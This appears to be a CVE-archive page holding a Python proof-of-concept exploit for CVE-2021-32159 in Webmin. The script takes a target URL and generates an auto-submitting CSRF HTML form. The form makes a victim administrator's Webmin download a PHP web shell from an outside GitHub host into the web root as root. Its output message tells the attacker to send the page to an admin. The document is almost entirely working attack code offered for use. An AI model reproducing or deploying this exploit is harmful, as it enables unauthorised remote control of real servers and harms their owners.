4837 Total CVEs
26 Years
GitHub
Home / 2021 / CVE-2021-32159
README.md
Rendering markdown...
POC / eXploit.py PY
⬇ Raw GitHub ✕ Close 
import time

print('''\033[1;37m

 __  __           _     ____  _          _________  _     _            _    
|  \/  |         | |   |___ \| |        |___  / _ \| |   | |          | |   
| \  / | ___  ___| |__   __) | |           / / | | | | __| |_   _  ___| | __
| |\/| |/ _ \/ __| '_ \ |__ <| |          / /| | | | |/ _` | | | |/ __| |/ /
| |  | |  __/\__ \ | | |___) | |  _ _    / /_| |_| | | (_| | |_| | (__|   < 
|_|  |_|\___||___/_| |_|____/|_| (_|_)  /_____\___/|_|\__,_|\__, |\___|_|\_/
                                                             __/ |          
                                                            |___/           

    \033[1;m''')

for i in range(101):
    print("\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m )  & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m  ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format(
            i), "\033[1;36m%\033[1;m", end="")
    time.sleep(0.02)
print("\n\n")

target = input(
    "\033[1;36m \nPlease input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m")

if target.endswith('/'):
    target = target
else:
    target = target + '/'


def CSRF_Generator():
    with open('CSRF_POC.html', 'w') as POC:
        POC.write \
            ('''

<html>
        <head>
            <meta name="referrer" content="never">
        </head>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="'''+target+'''updown/download.cgi" method="POST">
      <input type="hidden" name="urls" value="https&#58;&#47;&#47;raw&#46;githubusercontent&#46;com&#47;drag0s&#47;php&#45;webshell&#47;master&#47;webshell&#46;php" />
      <input type="hidden" name="dir" value="&#47;var&#47;www&#47;html&#47;Mesh3l&#95;Z0ldyck" />
      <input type="hidden" name="mkdir" value="1" />
      <input type="hidden" name="user" value="root" />
      <input type="hidden" name="group&#95;def" value="1" />
      <input type="hidden" name="bg" value="0" />
      <input type="hidden" name="day" value="25" />
      <input type="hidden" name="month" value="3" />
      <input type="hidden" name="year" value="2021" />
      <input type="hidden" name="hour" value="02" />
      <input type="hidden" name="min" value="30" />
      <input type="hidden" name="email&#95;def" value="1" />
      <input type="submit" value="Submit request" />
    </form>
        <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

    ''')
    POC.close()

    print("\033[1;36m\nThe CSRF_POC has been generated successfully,send it to a Webmin's Admin and ur web shell gonna be in this path /var/www/html/Mesh3l_Z0ldyck/webshell.php ^_^ \n \033[1;m")



def main():
    CSRF_Generator()


if __name__ == '__main__':
    main()